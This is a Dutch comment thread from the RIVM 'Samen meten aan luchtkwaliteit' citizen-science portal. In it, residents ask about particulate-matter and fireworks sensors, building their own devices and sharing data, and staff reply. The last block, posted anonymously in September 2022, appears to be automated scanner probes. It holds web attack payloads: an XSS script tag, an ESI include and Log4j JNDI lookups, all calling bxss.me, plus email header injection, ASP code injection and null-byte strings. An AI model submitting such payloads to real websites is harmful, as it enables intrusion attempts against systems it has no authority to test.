Banner

Heeft u vragen of opmerkingen of wilt u uw eigen ervaringen delen? Laat een reactie achter op één van onze pagina's of neem contact met ons op via samenmetenaanluchtkwaliteit@rivm.nl. Twitter mee over luchtkwaliteit en samen meten via #samenmeten en volg ons @samenmeten. 

Verantwoording: De in dit portal opgenomen informatie komt deels uit algemene bronnen en deze worden niet elke keer apart gerefereerd. Een deel van de foto’s komt uit de beeldbank van het RIVM Rijksinstituut voor Volksgezondheid en Milieu (Rijksinstituut voor Volksgezondheid en Milieu) of uit genoemde bronnen op het internet. Ingeval afbeeldingen, teksten, bronnen niet goed/correct worden benoemd horen dat graag via de email.
 

Add new comment


Comments

Kennis delen en ontwikkelen? Wij hebben bij M+P goede ervaring met wiki's op ons intranet gemaakt.
Met een wiki groeit de gedeelde kennis meteen in een bruikbare structuur - handiger dan alle weetjes uit forum-posts te moeten vissen.
Zou dat niet iets voor deze site zijn? "We" kunnen natuurlijk ook ervoor kiezen om gewoon nl.wikipedia.org te gebruiken? Meningen?

Submitted by Carsten Schelp… on Thu, 12/08/2016 - 11:00


Jammer dat de meeste links op de pagina Literatuur niet 'clickable' zijn!

Submitted by Peter Marwitz, RIVM on Thu, 12/08/2016 - 12:57


Kunnen we de fijnstof sensoren ook zelf bouwen?

Submitted by Peter Nijessen on Tue, 12/13/2016 - 17:10


@Carsten, dank voor de suggestie. Voor de eerste versie behoorde een wiki-toepassing nog niet tot de technische mogelijkheden. We nemen het mee in onze overweging voor het verbeteren van de interactiviteit.

@Peter Marwitz, dank voor de feedback. Dit punt komt op de lijst!

Submitted by Samen Meten, R… on Wed, 12/14/2016 - 09:15


@Peter Nijessen:

Zelf nabouwen van de uitgedeelde sensor kan, het gaat om niet meer dan een Shinyei ppd42, esp8266 (wij gebruiken de feather), twee weerstanden, voeding en kabel. Omdat de onderdelen momenteel bij verschillende webshops niet op voorraad zijn is het echter de vraag of dat nog op tijd zou lukken.

Mocht je echt aan de slag gaan horen we dat graag.

Team Samen meten aan luchtkwaliteit.

Submitted by Samen meten aa… on Wed, 12/14/2016 - 09:34


Hallo,

Ik zie dat een hoop van de huidige sensoren nogal hardcoded in het javascript van de pagina staan. Zijn deze ook als GIS-data (al dan niet real-time) beschikbaar? Ik zal hier dolgraag wat meer mee willen doen, zoals o.a. real-time heatmaps maken. Zelfs een courante geojson zal al een verbetering zijn.

Submitted by Guus Klaas on Mon, 12/19/2016 - 13:21


@Guus: De door de simpele vuurwerksensoren (Shinyei's) geleverde getallen zijn in absolute zin niet direct met elkaar of met andere metingen vergelijkbaar. Daarom wordt er nog hard gewerkt aan het definieren van een nuttige maat om het effect van vuurwerk op de stofconcentraties weer te geven. Wellicht dat die maat input voor analyses of weergaven van anderen kan zijn. Omdat het nog werk in uitvoering is, staat de data nog niet gangbare standaard voor geografische informatie. We komen hier zo snel mogelijk op terug.

Team Samen meten aan luchtkwaliteit

Submitted by CB on Tue, 12/20/2016 - 11:44


Nadat ik de wifi verbinding aanklikte en het wachtwoord enz had ikgevuld kreeg ik de melding dat er geen verbinding met de pagina 192.168. 4 gemaakt kan worden. Op nieuw opstarten, een laptop en een tablet geeft geen resultaat

Submitted by Bert on Tue, 12/27/2016 - 11:58


Beste Bert,

Het kan zijn dat de sensor al aan het netwerk is gekoppeld, dan knippert er circa 10x een rode led bij het aansluiten en verder merk je er niets meer aan. Er komt dan ook geen netwerk 192.168.4.1 in de lucht. Dit kun je controleren door de stroom er vanaf te halen, weer aansluiten en zien of de rode led na 5-20 seconden knippert.

Als er geen rode knippers zijn en de rode en blauwe led samen continu branden dan staat de sensor in configuratie-modus, zie dan het aansluitproces: https://www.samenmetenaanluchtkwaliteit.nl/node/441 en eventueel https://www.samenmetenaanluchtkwaliteit.nl/veelgestelde-vragen-vuurwerk-2016-2017-rivm .

Als er geen rode knippers en geen rode+blauwe led zijn, dan zou er iets mis kunnen zijn met de chip. Laat svp weten wat de uitkomst van het doorlopen van bovenstaande is.

Met vriendelijke groet,

Team Samen meten aan luchtkwaliteit

Submitted by wesselij on Tue, 12/27/2016 - 12:54

In reply to by Bert


Ik zie dat er op het Groningse platteland niet veel gemeten wordt terwijl we hier in Stitswerd 'onder' de kolencentrale wonen en veel houtkachels hebben. Ik zou graag meedoen wanneer er weer meetinstrumenten worden uitgezet.

Submitted by Liesbeth Bunnik on Sat, 12/31/2016 - 09:18


Vanmorgen las ik dat de RIVM een proef doet door particulieren een fijnstofmeter te laten installeren. Indien mogelijk zou ik graag deelnemen aan deze proef als dat nog mogelijk is.

Vaak ben ik door mijn astmatische aanleg nogal kortademig terwijl er niet zomaar een aanwijzing is waarom. Ik weet wat ik wel en niet moet doen om zo fit mogelijk te blijven, geen overgewicht, geen vloerbedekking verwijderen, niet roken, etc. Steeds vaker heb ik het idee dat de “ongrijpbare factor” wel eens de luchtkwaliteit kan zijn. Het zou daarom geweldig zijn als ik aan de fijnstofmetingen mee mag doen.

Submitted by Peter Ritzen on Sat, 12/31/2016 - 09:59


Beste Liesbeth en Peter:

Helaas zijn alle sensoren al uitgedeeld. Zie https://www.samenmetenaanluchtkwaliteit.nl/had-u-mee-willen-doen voor wat meer informatie.

Submitted by wesselij on Sat, 12/31/2016 - 10:45

In reply to by Liesbeth Bunnik


Hoe kun je je als burger aanmelden? Ik meet graag mee!

Submitted by Wil on Sun, 01/01/2017 - 14:00


Beste Wil,

Helaas zijn alle sensoren al uitgedeeld. Zie https://www.samenmetenaanluchtkwaliteit.nl/had-u-mee-willen-doen voor wat meer informatie.

Submitted by wesselij on Sun, 01/01/2017 - 18:52

In reply to by Wil


Graag zou ik de luchtkwaliteit in mijn eigen woonomgeving (IJsselkade Doesburg) willen meten, vastleggen en delen.
Graag zou ik de daarvoor benodigde apparatuur in bruikleen willen krijgen. Zou dat mogelijk zijn?

Submitted by PW (Pieter) de… on Mon, 03/20/2017 - 14:52


Beste Pieter,
wij hebben helaas geen sensoren voor bruikleen. Voorbeelden op het portaal laten zien dat je met enige elektronicakennis zelf sensoren kunt maken. Dat hoeft niet heel duur te zijn. Misschien in samenwerking met buurtbewoners? Of met mensen die al zelf meten en actief zijn op twitter. We onderzoeken momenteel de waarde van deze goedkope sensoren, zie bijvoorbeeld het project Vuurwerk 2017-2018.

Submitted by Team samenmeten on Wed, 03/22/2017 - 09:44


Ik heb binnenkort een stofsensor, de Plantower PMS7003, deze claimt in zes categorieen qua deeltjesgrootte te kunnen meten. Ik ga de verschillende outputs van deze sensor plotten m.b.v. MQTT en grafana. Het zou leuk zijn als ik mijn meetdata kan delen met dit project. Hoe kan ik dat delen?

Ik heb zelf ook ervaring met LoRaWAN en TheThingsNetwork, zou daarmee misschien ook kunnen helpen.

Submitted by Bertrik Sikken on Sun, 12/10/2017 - 08:55


Beste Bertrik Sikken. Momenteel werken we aan een protocol hiervoor. Zou u een mail met deze vraag willen sturen aan samenmeten@rivm.nl. Dan struren we u het protocol zodra het beschikbaar is.

Submitted by grausl on Fri, 12/15/2017 - 13:48

In reply to by Bertrik Sikken


Goedendag,
Samen meten wat een mooi project.
Kan ik mij daar bij aansluiten? Zoja hoe zie op de kaart mijn woonplaats nog geen meet punten (Barneveld).

Met vriendelijke groet,
Keimpe Eland

Submitted by Keimpe Eland on Sun, 12/31/2017 - 18:44


Beste Keimpe
we hebben geen kant en klare sensoren voor je, maar met wat technische handigheid kun je zelf een sensor bouwen en de data delen. Zie de info op deze website. Bijvoorbeeld via het vuurwerkexperiment.

Submitted by Team Samen Meten on Wed, 01/03/2018 - 10:57


Ik ben of (moet ik zeggen was ?) deelnemer in het project in Rotterdam Ommoord. Ik hoor al maanden niets meet over het project. Het laatste contact was een email van medewerker Joey ten Cate van 23 april die ik 12 mei beantwoordde. Daarna heb ik niets meer vernomen. Reeds geruime tijd werkt de website niet waarop ik de meetgegevens uit mijn buurt kon zien contact blijkt niet mogelijk. Het project lijkt van de aardbodem verdwenen, behalve de meetkit aan mijn dakgoot.
Graag reactie.


Submitted by P.C. Scheublin on Sun, 08/05/2018 - 15:01


Beste P.C. Scheublin, kunt u ons een e-mail sturen op ons samenmeten emailadres (zie contact onderaan de pagina). Dan nemen we contact op.

Submitted by voogtm on Mon, 08/06/2018 - 11:58

In reply to by P.C. Scheublin


Ik wil graag info over hoe ik een bijdrage kan leveren aan het mysense project. Neem aub contact met mij op.
Ben 70 jaar en en werkzaam geweest in de ITC

Gr. Tonnie

Submitted by Tonnie Derks on Tue, 08/21/2018 - 16:03


In overleg met Tonnie zijn de contactgegevens verwijderd.

Submitted by grausl on Thu, 08/30/2018 - 10:27

In reply to by Tonnie Derks


Omdat ik rond 30 jaaren evaring heb in de omgang mmet PLC, PC, em microcomputer heb ik mij rond 12 sensoren gekocht die niet goedkoop waren en heb mij een soort weerstation gebouwt. Geen regen en wind. Maar ik heb UV-A, UV-B, UB-C en UB-D sensoren en ook een Grove - Multichannel Gas Sensor onder anderen voor lucht qualiteit. Plus licht sterkte, temperatuur en vochtigkeit in merdere ruimtes. Alles draait op PLC en Arduino UNO + Wifi ESP8266 modulen. Waar kan ik meedoen? Want wij moeten met ze allen zamen werken in Nederland.

Submitted by Mike Fleischer on Sun, 10/14/2018 - 10:50


@Mike, momenteel kunnen NO2 en fijnstofmetingen op het samenmeten dataportaal. Vraag is wat jouw multichannel gas sensor meet en of dat door kan gaan voor NO2 waarde in ug/m3. Je kunt ons mailen op bovenstaand emailadres.

Submitted by voogtm on Mon, 10/22/2018 - 11:30

In reply to by Mike Fleischer


De reactie mogelijkheid is (tijdelijk) uitgezet op deze pagina. U kunt ons altijd per e-mail bereiken op samenmeten@rivm.nl

Submitted by grausl on Fri, 11/09/2018 - 11:59


De doorkliklink naar het samen meten dataportaal komen op een vreemde pagina uit die er niet op slaat.

Submitted by carel lanting on Wed, 09/21/2022 - 18:36


De koppeling naar het dataportaal komt uit op de website van de 22 weken prik

Submitted by Peter van de Rovaart on Thu, 09/22/2022 - 09:46


1CcNKiaM5QO

Submitted by Anonymous on Fri, 09/23/2022 - 04:14


'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=208-24748&h=208-ac890-2&"></script>

Submitted by Anonymous on Fri, 09/23/2022 - 04:14


%00

Submitted by Anonymous on Fri, 09/23/2022 - 04:14


qv0V4V67

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


<esi:include src="http://bxss.me/rpb.png"/>

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


${10000164+9999926}

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


${j${::-n}di:dns${::-:}${::-/}/hitvcxtlabtjg42c00${::-.}bxss.me}zzzz

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


&n959454=v946623

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


response.write(9704397*9421245)

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


'+response.write(9704397*9421245)+'

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


%0abcc:074625.208-24761.208.ac890.19258.2@bxss.me

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


"+response.write(9704397*9421245)+"

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.208-24762.208.ac890${::-.}1${::-.}bxss.me}}

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


to@example.com>%0d%0abcc:074625.208-24763.208.ac890.19258.2@bxss.me

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Submitted by Anonymous on Fri, 09/23/2022 - 04:15


HttP://bxss.me/t/xss.html?%00

Submitted by Anonymous on Fri, 09/23/2022 - 04:16


)

Submitted by Anonymous on Fri, 09/23/2022 - 04:16


bxss.me/t/xss.html?%00

Submitted by Anonymous on Fri, 09/23/2022 - 04:16


!(()&&!|*|*|

Submitted by Anonymous on Fri, 09/23/2022 - 04:16


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Submitted by Anonymous on Fri, 09/23/2022 - 04:16


'.gethostbyname(lc('hitph'.'xpulandt9d354.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(72).chr(118).chr(85).'

Submitted by Anonymous on Fri, 09/23/2022 - 04:16